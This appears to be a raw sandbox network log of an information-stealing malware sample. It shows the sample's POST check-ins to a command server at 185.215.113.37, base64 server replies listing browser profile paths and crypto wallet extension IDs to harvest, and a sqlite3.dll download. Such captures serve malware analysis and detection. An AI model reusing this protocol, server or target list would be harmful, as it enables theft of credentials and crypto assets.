Sep 26, 2024 00:38:59.976375103 CEST	469	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----AFCFHJJECAEHJJKEHIDB Host: 185.215.113.37 Content-Length: 268 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 41 46 43 46 48 4a 4a 45 43 41 45 48 4a 4a 4b 45 48 49 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 66 32 33 30 61 30 30 36 63 36 61 39 34 36 30 64 33 37 33 64 65 33 65 66 64 64 66 37 62 35 37 39 36 66 64 36 32 66 64 63 62 32 36 63 35 38 64 35 30 33 35 63 35 66 30 33 64 37 32 66 38 39 30 35 62 34 66 37 66 61 61 0d 0a 2d 2d 2d 2d 2d 2d 41 46 43 46 48 4a 4a 45 43 41 45 48 4a 4a 4b 45 48 49 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 41 46 43 46 48 4a 4a 45 43 41 45 48 4a 4a 4b 45 48 49 44 42 2d 2d 0d 0a Data Ascii: ------AFCFHJJECAEHJJKEHIDBContent-Disposition: form-data; name="token"3f230a006c6a9460d373de3efddf7b5796fd62fdcb26c58d5035c5f03d72f8905b4f7faa------AFCFHJJECAEHJJKEHIDBContent-Disposition: form-data; name="message"browsers------AFCFHJJECAEHJJKEHIDB--
Sep 26, 2024 00:39:00.200824976 CEST	1236	IN	HTTP/1.1 200 OK Date: Wed, 25 Sep 2024 22:39:00 GMT Server: Apache/2.4.52 (Ubuntu) Vary: Accept-Encoding Content-Length: 1520 Keep-Alive: timeout=5, max=98 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 47 4e 6f 63 6d 39 74 5a 53 35 6c 65 47 56 38 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 53 42 44 59 57 35 68 63 6e 6c 38 58 45 64 76 62 32 64 73 5a 56 78 44 61 48 4a 76 62 57 55 67 55 33 68 54 58 46 56 7a 5a 58 49 67 52 47 46 30 59 58 78 6a 61 48 4a 76 62 57 56 38 59 32 68 79 62 32 31 6c 4c 6d 56 34 5a 58 78 44 61 48 4a 76 62 57 6c 31 62 58 78 63 51 32 68 79 62 32 31 70 64 57 31 63 56 58 4e 6c 63 69 42 45 59 58 52 68 66 47 4e 6f 63 6d 39 74 5a 58 78 6a 61 48 4a 76 62 57 55 75 5a 58 68 6c 66 45 46 74 61 57 64 76 66 46 78 42 62 57 6c 6e 62 31 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 44 42 38 56 47 39 79 59 32 68 38 58 46 52 76 63 6d 4e 6f 58 46 56 7a 5a 58 49 67 52 47 46 30 59 58 78 6a 61 48 4a 76 62 57 56 38 4d 48 78 57 61 58 5a 68 62 47 52 70 66 46 78 57 61 58 5a 68 62 47 52 70 58 46 [TRUNCATED] Data Ascii: R29vZ2xlIENocm9tZXxcR29vZ2xlXENocm9tZVxVc2VyIERhdGF8Y2hyb21lfGNocm9tZS5leGV8R29vZ2xlIENocm9tZSBDYW5hcnl8XEdvb2dsZVxDaHJvbWUgU3hTXFVzZXIgRGF0YXxjaHJvbWV8Y2hyb21lLmV4ZXxDaHJvbWl1bXxcQ2hyb21pdW1cVXNlciBEYXRhfGNocm9tZXxjaHJvbWUuZXhlfEFtaWdvfFxBbWlnb1xVc2VyIERhdGF8Y2hyb21lfDB8VG9yY2h8XFRvcmNoXFVzZXIgRGF0YXxjaHJvbWV8MHxWaXZhbGRpfFxWaXZhbGRpXFVzZXIgRGF0YXxjaHJvbWV8dml2YWxkaS5leGV8Q29tb2RvIERyYWdvbnxcQ29tb2RvXERyYWdvblxVc2VyIERhdGF8Y2hyb21lfDB8RXBpY1ByaXZhY3lCcm93c2VyfFxFcGljIFByaXZhY3kgQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfDB8Q29jQ29jfFxDb2NDb2NcQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfDB8QnJhdmV8XEJyYXZlU29mdHdhcmVcQnJhdmUtQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfGJyYXZlLmV4ZXxDZW50IEJyb3dzZXJ8XENlbnRCcm93c2VyXFVzZXIgRGF0YXxjaHJvbWV8MHw3U3RhcnxcN1N0YXJcN1N0YXJcVXNlciBEYXRhfGNocm9tZXwwfENoZWRvdCBCcm93c2VyfFxDaGVkb3RcVXNlciBEYXRhfGNocm9tZXwwfE1pY3Jvc29mdCBFZGdlfFxNaWNyb3NvZnRcRWRnZVxVc2VyIERhdGF8Y2hyb21lfG1zZWRnZS5leGV8MzYwIEJyb3dzZXJ8XDM2MEJyb3dzZXJcQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfDB8UVFCcm93c2VyfFxUZW5jZW50XFFRQnJvd3Nl
Sep 26, 2024 00:39:00.200850010 CEST	124	IN	Data Raw: 63 6c 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 44 42 38 51 33 4a 35 63 48 52 76 56 47 46 69 66 46 78 44 63 6e 6c 77 64 47 39 55 59 57 49 67 51 6e 4a 76 64 33 4e 6c 63 6c 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 Data Ascii: clxVc2VyIERhdGF8Y2hyb21lfDB8Q3J5cHRvVGFifFxDcnlwdG9UYWIgQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfGJyb3dzZXIuZXhlfE9wZXJhIFN0YWJsZXxc
Sep 26, 2024 00:39:00.334503889 CEST	388	IN	Data Raw: 54 33 42 6c 63 6d 45 67 55 32 39 6d 64 48 64 68 63 6d 56 38 62 33 42 6c 63 6d 46 38 62 33 42 6c 63 6d 45 75 5a 58 68 6c 66 45 39 77 5a 58 4a 68 49 45 64 59 49 46 4e 30 59 57 4a 73 5a 58 78 63 54 33 42 6c 63 6d 45 67 55 32 39 6d 64 48 64 68 63 6d Data Ascii: T3BlcmEgU29mdHdhcmV8b3BlcmF8b3BlcmEuZXhlfE9wZXJhIEdYIFN0YWJsZXxcT3BlcmEgU29mdHdhcmV8b3BlcmF8b3BlcmEuZXhlfE1vemlsbGEgRmlyZWZveHxcTW96aWxsYVxGaXJlZm94XFByb2ZpbGVzfGZpcmVmb3h8MHxQYWxlIE1vb258XE1vb25jaGlsZCBQcm9kdWN0aW9uc1xQYWxlIE1vb25cUHJvZmlsZXN
Sep 26, 2024 00:39:00.573858976 CEST	468	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----IJKKEHJDHJKFIECAAKFI Host: 185.215.113.37 Content-Length: 267 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 49 4a 4b 4b 45 48 4a 44 48 4a 4b 46 49 45 43 41 41 4b 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 66 32 33 30 61 30 30 36 63 36 61 39 34 36 30 64 33 37 33 64 65 33 65 66 64 64 66 37 62 35 37 39 36 66 64 36 32 66 64 63 62 32 36 63 35 38 64 35 30 33 35 63 35 66 30 33 64 37 32 66 38 39 30 35 62 34 66 37 66 61 61 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 4b 4b 45 48 4a 44 48 4a 4b 46 49 45 43 41 41 4b 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 4b 4b 45 48 4a 44 48 4a 4b 46 49 45 43 41 41 4b 46 49 2d 2d 0d 0a Data Ascii: ------IJKKEHJDHJKFIECAAKFIContent-Disposition: form-data; name="token"3f230a006c6a9460d373de3efddf7b5796fd62fdcb26c58d5035c5f03d72f8905b4f7faa------IJKKEHJDHJKFIECAAKFIContent-Disposition: form-data; name="message"plugins------IJKKEHJDHJKFIECAAKFI--
Sep 26, 2024 00:39:00.796380997 CEST	1236	IN	HTTP/1.1 200 OK Date: Wed, 25 Sep 2024 22:39:00 GMT Server: Apache/2.4.52 (Ubuntu) Vary: Accept-Encoding Content-Length: 7116 Keep-Alive: timeout=5, max=97 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 54 57 56 30 59 55 31 68 63 32 74 38 5a 47 70 6a 62 47 4e 72 61 32 64 73 5a 57 4e 6f 62 32 39 69 62 47 35 6e 5a 32 68 6b 61 57 35 74 5a 57 56 74 61 32 4a 6e 59 32 6c 38 4d 58 77 77 66 44 42 38 54 57 56 30 59 55 31 68 63 32 74 38 5a 57 70 69 59 57 78 69 59 57 74 76 63 47 78 6a 61 47 78 6e 61 47 56 6a 5a 47 46 73 62 57 56 6c 5a 57 46 71 62 6d 6c 74 61 47 31 38 4d 58 77 77 66 44 42 38 54 57 56 30 59 55 31 68 63 32 74 38 62 6d 74 69 61 57 68 6d 59 6d 56 76 5a 32 46 6c 59 57 39 6c 61 47 78 6c 5a 6d 35 72 62 32 52 69 5a 57 5a 6e 63 47 64 72 62 6d 35 38 4d 58 77 77 66 44 42 38 56 48 4a 76 62 6b 78 70 62 6d 74 38 61 57 4a 75 5a 57 70 6b 5a 6d 70 74 62 57 74 77 59 32 35 73 63 47 56 69 61 32 78 74 62 6d 74 76 5a 57 39 70 61 47 39 6d 5a 57 4e 38 4d 58 77 77 66 44 42 38 51 6d 6c 75 59 57 35 6a 5a 53 42 58 59 57 78 73 5a 58 52 38 5a 6d 68 69 62 32 68 70 62 57 46 6c 62 47 4a 76 61 48 42 71 59 6d 4a 73 5a 47 4e 75 5a 32 4e 75 59 58 42 75 5a 47 39 6b 61 6e 42 38 4d 58 77 77 66 44 42 38 57 57 39 79 62 32 6c 38 5a 6d [TRUNCATED] Data Ascii: TWV0YU1hc2t8ZGpjbGNra2dsZWNob29ibG5nZ2hkaW5tZWVta2JnY2l8MXwwfDB8TWV0YU1hc2t8ZWpiYWxiYWtvcGxjaGxnaGVjZGFsbWVlZWFqbmltaG18MXwwfDB8TWV0YU1hc2t8bmtiaWhmYmVvZ2FlYW9laGxlZm5rb2RiZWZncGdrbm58MXwwfDB8VHJvbkxpbmt8aWJuZWpkZmptbWtwY25scGVia2xtbmtvZW9paG9mZWN8MXwwfDB8QmluYW5jZSBXYWxsZXR8Zmhib2hpbWFlbGJvaHBqYmJsZGNuZ2NuYXBuZG9kanB8MXwwfDB8WW9yb2l8ZmZuYmVsZmRvZWlvaGVua2ppYm5tYWRqaWVoamhhamJ8MXwwfDB8Q29pbmJhc2UgV2FsbGV0IGV4dGVuc2lvbnxobmZhbmtub2NmZW9mYmRkZ2Npam5taG5mbmtkbmFhZHwxfDB8MXxHdWFyZGF8aHBnbGZoZ2ZuaGJncGpkZW5qZ21kZ29laWFwcGFmbG58MXwwfDB8SmF4eCBMaWJlcnR5fGNqZWxmcGxwbGViZGpqZW5sbHBqY2JsbWprZmNmZm5lfDF8MHwwfGlXYWxsZXR8a25jY2hkaWdvYmdoZW5iYmFkZG9qam5uYW9nZnBwZmp8MXwwfDB8TUVXIENYfG5sYm1ubmlqY25sZWdrampwY2ZqY2xtY2ZnZ2ZlZmRtfDF8MHwwfEd1aWxkV2FsbGV0fG5hbmptZGtuaGtpbmlmbmtnZGNnZ2NmbmhkYWFtbW1qfDF8MHwwfFJvbmluIFdhbGxldHxmbmpobWtoaG1rYmpra2FibmRjbm5vZ2Fnb2dibmVlY3wxfDB8MHxOZW9MaW5lfGNwaGhsZ21nYW1lb2RuaGtqZG1rcGFubGVsbmxvaGFvfDF8MHwwfENMViBXYWxsZXR8bmhua2JrZ2ppa2djaWdhZG9ta3BoYWxhbm5kY2Fwamt8MXwwfDB8TGlxdWFsaXR5
Sep 26, 2024 00:39:00.796416998 CEST	124	IN	Data Raw: 49 46 64 68 62 47 78 6c 64 48 78 72 63 47 5a 76 63 47 74 6c 62 47 31 68 63 47 4e 76 61 58 42 6c 62 57 5a 6c 62 6d 52 74 5a 47 4e 6e 61 47 35 6c 5a 32 6c 74 62 6e 77 78 66 44 42 38 4d 48 78 55 5a 58 4a 79 59 53 42 54 64 47 46 30 61 57 39 75 49 46 Data Ascii: IFdhbGxldHxrcGZvcGtlbG1hcGNvaXBlbWZlbmRtZGNnaG5lZ2ltbnwxfDB8MHxUZXJyYSBTdGF0aW9uIFdhbGxldHxhaWlmYm5iZm9icG1lZWtpcGhlZWlqaW1k
Sep 26, 2024 00:39:00.796426058 CEST	1236	IN	Data Raw: 63 47 35 73 63 47 64 77 63 48 77 78 66 44 42 38 4d 48 78 4c 5a 58 42 73 63 6e 78 6b 62 57 74 68 62 57 4e 72 62 6d 39 6e 61 32 64 6a 5a 47 5a 6f 61 47 4a 6b 5a 47 4e 6e 61 47 46 6a 61 47 74 6c 61 6d 56 68 63 48 77 78 66 44 42 38 4d 48 78 54 62 32 Data Ascii: cG5scGdwcHwxfDB8MHxLZXBscnxkbWthbWNrbm9na2djZGZoaGJkZGNnaGFjaGtlamVhcHwxfDB8MHxTb2xsZXR8ZmhtZmVuZGdkb2NtY2JtZmlrZGNvZ29mcGhpbW5rbm98MXwwfDB8QXVybyBXYWxsZXQoTWluYSBQcm90b2NvbCl8Y25tYW1hYWNocHBua2pnbmlsZHBkbWthYWtlam5oYWV8MXwwfDB8UG9seW1lc2ggV2F
Sep 26, 2024 00:39:00.796564102 CEST	1236	IN	Data Raw: 55 32 39 73 5a 6d 78 68 63 6d 55 67 56 32 46 73 62 47 56 30 66 47 4a 6f 61 47 68 73 59 6d 56 77 5a 47 74 69 59 58 42 68 5a 47 70 6b 62 6d 35 76 61 6d 74 69 5a 32 6c 76 61 57 39 6b 59 6d 6c 6a 66 44 46 38 4d 48 77 77 66 45 4e 35 59 57 35 76 49 46 Data Ascii: U29sZmxhcmUgV2FsbGV0fGJoaGhsYmVwZGtiYXBhZGpkbm5vamtiZ2lvaW9kYmljfDF8MHwwfEN5YW5vIFdhbGxldHxka2RlZGxwZ2RtbWtrZmphYmZmZWdhbmllYW1ma2xrbXwxfDB8MHxLSEN8aGNmbHBpbmNwcHBkY2xpbmVhbG1hbmRpamNtbmtiZ258MXwwfDB8VGV6Qm94fG1uZmlmZWZrYWpnb2ZrY2prZW1pZGlhZWN
Sep 26, 2024 00:39:00.796575069 CEST	448	IN	Data Raw: 63 47 56 76 61 32 4a 70 61 32 68 6d 59 32 6c 38 4d 58 77 77 66 44 42 38 54 57 46 79 64 47 6c 68 62 69 42 42 63 48 52 76 63 79 42 58 59 57 78 73 5a 58 52 38 5a 57 5a 69 5a 32 78 6e 62 32 5a 76 61 58 42 77 59 6d 64 6a 61 6d 56 77 62 6d 68 70 59 6d Data Ascii: cGVva2Jpa2hmY2l8MXwwfDB8TWFydGlhbiBBcHRvcyBXYWxsZXR8ZWZiZ2xnb2ZvaXBwYmdjamVwbmhpYmxhaWJjbmNsZ2t8MXwwfDB8RmlubmllfGNqbWtuZGpobmFnY2ZicGllbW5rZHBvbWNjbmpibG1qfDF8MHwwfExlYXAgVGVycmEgV2FsbGV0fGFpamNiZWRvaWptZ25sbWplZWdqYWdsbWVwYm1wa3BpfDF8MHwwfFR
Sep 26, 2024 00:39:00.796983004 CEST	1236	IN	Data Raw: 4d 58 77 77 66 44 42 38 52 55 39 54 49 45 46 31 64 47 68 6c 62 6e 52 70 59 32 46 30 62 33 4a 38 62 32 56 73 61 6d 52 73 5a 48 42 75 62 57 52 69 59 32 68 76 62 6d 6c 6c 62 47 6c 6b 5a 32 39 69 5a 47 52 6d 5a 6d 5a 73 59 57 78 38 4d 58 77 77 66 44 Data Ascii: MXwwfDB8RU9TIEF1dGhlbnRpY2F0b3J8b2VsamRsZHBubWRiY2hvbmllbGlkZ29iZGRmZmZsYWx8MXwwfDB8R0F1dGggQXV0aGVudGljYXRvcnxpbGdjbmhlbHBjaG5jZWVpcGlwaWphbGprYmxiY29ibHwxfDB8MHxCaXR3YXJkZW58bm5nY2Vja2JhcGViZmltbmxuaWlpYWhrYW5kY2xibGJ8MXwwfDB8S2VlUGFzc1hDfG9
Sep 26, 2024 00:39:00.796993017 CEST	224	IN	Data Raw: 62 47 78 6c 64 48 78 6d 61 57 6c 72 62 32 31 74 5a 47 52 69 5a 57 4e 6a 59 57 39 70 59 32 39 6c 61 6d 39 75 61 57 46 74 62 57 35 68 62 47 74 6d 59 58 77 78 66 44 42 38 4d 48 78 46 59 33 52 76 49 46 64 68 62 47 78 6c 64 48 78 69 5a 32 70 76 5a 33 Data Ascii: bGxldHxmaWlrb21tZGRiZWNjYW9pY29lam9uaWFtbW5hbGtmYXwxfDB8MHxFY3RvIFdhbGxldHxiZ2pvZ3BvaWRlamRlbWdvb2NocG5rbWRqcG9jZ2toYXwxfDB8MHxDb2luaHVifGpnYWFpbWFqaXBicGRvZ3BkZ2xoYXBobGRha2lrZ2VmfDF8MHwwfE11bHRpdmVyc1ggRGVGaSBXYWxsZXR8ZG5n
Sep 26, 2024 00:39:00.797003031 CEST	1236	IN	Data Raw: 62 57 78 69 62 47 4e 76 5a 47 5a 76 59 6e 42 6b 63 47 56 6a 59 57 46 6b 5a 32 5a 69 59 32 64 6e 5a 6d 70 6d 62 6d 31 38 4d 58 77 77 66 44 42 38 52 6e 4a 76 62 6e 52 70 5a 58 49 67 56 32 46 73 62 47 56 30 66 47 74 77 63 47 5a 6b 61 57 6c 77 63 47 Data Ascii: bWxibGNvZGZvYnBkcGVjYWFkZ2ZiY2dnZmpmbm18MXwwfDB8RnJvbnRpZXIgV2FsbGV0fGtwcGZkaWlwcGhmY2NlbWNpZ25oaWZwamthcGZiaWhkfDF8MHwwfFNhZmVQYWx8bGdtcGNwZ2xwbmdkb2FsYmdlb2xkZWFqZmNsbmhhZmF8MXwwfDB8U3ViV2FsbGV0IC0gUG9sa2Fkb3QgV2FsbGV0fG9uaG9nZmplYWNuZm9vZmt
Sep 26, 2024 00:39:00.797013044 CEST	368	IN	Data Raw: 61 57 35 38 4d 58 77 77 66 44 42 38 55 32 46 6d 5a 56 42 68 62 43 42 58 59 57 78 73 5a 58 52 38 59 58 42 6c 62 6d 74 6d 59 6d 4a 77 62 57 68 70 61 47 56 6f 62 57 6c 6f 62 6d 52 74 62 57 4e 6b 59 57 35 68 59 32 39 73 62 6d 68 38 4d 58 77 77 66 44 Data Ascii: aW58MXwwfDB8U2FmZVBhbCBXYWxsZXR8YXBlbmtmYmJwbWhpaGVobWlobmRtbWNkYW5hY29sbmh8MXwwfDB8Qml0Z2V0IFdhbGxldHxqaWlkaWFhbGlobW1oZGRqZ2JuYmdkZmZsZWxvY3Bha3wxfDB8MHxUT04gV2FsbGV0fG5waHBscGdvYWtoaGpjaGtraG1pZ2dha2lqbmtoZm5kfDF8MHwwfE15VG9uV2FsbGV0fGZsZGZ
Sep 26, 2024 00:39:00.799197912 CEST	469	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----DHJDAFIEHIEGDHIDGDGH Host: 185.215.113.37 Content-Length: 268 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 44 48 4a 44 41 46 49 45 48 49 45 47 44 48 49 44 47 44 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 66 32 33 30 61 30 30 36 63 36 61 39 34 36 30 64 33 37 33 64 65 33 65 66 64 64 66 37 62 35 37 39 36 66 64 36 32 66 64 63 62 32 36 63 35 38 64 35 30 33 35 63 35 66 30 33 64 37 32 66 38 39 30 35 62 34 66 37 66 61 61 0d 0a 2d 2d 2d 2d 2d 2d 44 48 4a 44 41 46 49 45 48 49 45 47 44 48 49 44 47 44 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 44 48 4a 44 41 46 49 45 48 49 45 47 44 48 49 44 47 44 47 48 2d 2d 0d 0a Data Ascii: ------DHJDAFIEHIEGDHIDGDGHContent-Disposition: form-data; name="token"3f230a006c6a9460d373de3efddf7b5796fd62fdcb26c58d5035c5f03d72f8905b4f7faa------DHJDAFIEHIEGDHIDGDGHContent-Disposition: form-data; name="message"fplugins------DHJDAFIEHIEGDHIDGDGH--
Sep 26, 2024 00:39:01.023580074 CEST	335	IN	HTTP/1.1 200 OK Date: Wed, 25 Sep 2024 22:39:00 GMT Server: Apache/2.4.52 (Ubuntu) Vary: Accept-Encoding Content-Length: 108 Keep-Alive: timeout=5, max=96 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 54 57 56 30 59 55 31 68 63 32 74 38 4d 48 78 33 5a 57 4a 6c 65 48 52 6c 62 6e 4e 70 62 32 35 41 62 57 56 30 59 57 31 68 63 32 73 75 61 57 39 38 55 6d 39 75 61 57 34 67 56 32 46 73 62 47 56 30 66 44 42 38 63 6d 39 75 61 57 34 74 64 32 46 73 62 47 56 30 51 47 46 34 61 57 56 70 62 6d 5a 70 62 6d 6c 30 65 53 35 6a 62 32 31 38 Data Ascii: TWV0YU1hc2t8MHx3ZWJleHRlbnNpb25AbWV0YW1hc2suaW98Um9uaW4gV2FsbGV0fDB8cm9uaW4td2FsbGV0QGF4aWVpbmZpbml0eS5jb218
Sep 26, 2024 00:39:01.049926043 CEST	202	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----JJECGCBGDBKJJKEBFBFH Host: 185.215.113.37 Content-Length: 5467 Connection: Keep-Alive Cache-Control: no-cache
Sep 26, 2024 00:39:01.903650045 CEST	202	IN	HTTP/1.1 200 OK Date: Wed, 25 Sep 2024 22:39:01 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=95 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Sep 26, 2024 00:39:02.149496078 CEST	93	OUT	GET /0d60be0de163924d/sqlite3.dll HTTP/1.1 Host: 185.215.113.37 Cache-Control: no-cache
Sep 26, 2024 00:39:03.404117107 CEST	1236	IN	HTTP/1.1 200 OK Date: Wed, 25 Sep 2024 22:39:02 GMT Server: Apache/2.4.52 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 11:30:30 GMT ETag: "10e436-5e7ec6832a180" Accept-Ranges: bytes Content-Length: 1106998 Content-Type: application/x-msdos-program Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 00 00 00 0d 00 d0 0c 00 00 00 30 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 20 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELc!&@a0: 0@< .text%&`P`.data\|'@(,@`.rdatapDpFT@`@.bss(`.edata,@0@.idata@0.CRT,@0.tls @0.rsrc0@0.reloc<@>@0B/48@@B/19R"@B/31]'`(@B/45-.@B/57\B@0B/70
Sep 26, 2024 00:39:03.404853106 CEST	1236	IN	HTTP/1.1 200 OK Date: Wed, 25 Sep 2024 22:39:02 GMT Server: Apache/2.4.52 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 11:30:30 GMT ETag: "10e436-5e7ec6832a180" Accept-Ranges: bytes Content-Length: 1106998 Content-Type: application/x-msdos-program Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 00 00 00 0d 00 d0 0c 00 00 00 30 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 20 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELc!&@a0: 0@< .text%&`P`.data\|'@(,@`.rdatapDpFT@`@.bss(`.edata,@0@.idata@0.CRT,@0.tls @0.rsrc0@0.reloc<@>@0B/48@@B/19R"@B/31]'`(@B/45-.@B/57\B@0B/70
Sep 26, 2024 00:39:03.405289888 CEST	1236	IN	HTTP/1.1 200 OK Date: Wed, 25 Sep 2024 22:39:02 GMT Server: Apache/2.4.52 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 11:30:30 GMT ETag: "10e436-5e7ec6832a180" Accept-Ranges: bytes Content-Length: 1106998 Content-Type: application/x-msdos-program Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 00 00 00 0d 00 d0 0c 00 00 00 30 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 20 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELc!&@a0: 0@< .text%&`P`.data\|'@(,@`.rdatapDpFT@`@.bss(`.edata,@0@.idata@0.CRT,@0.tls 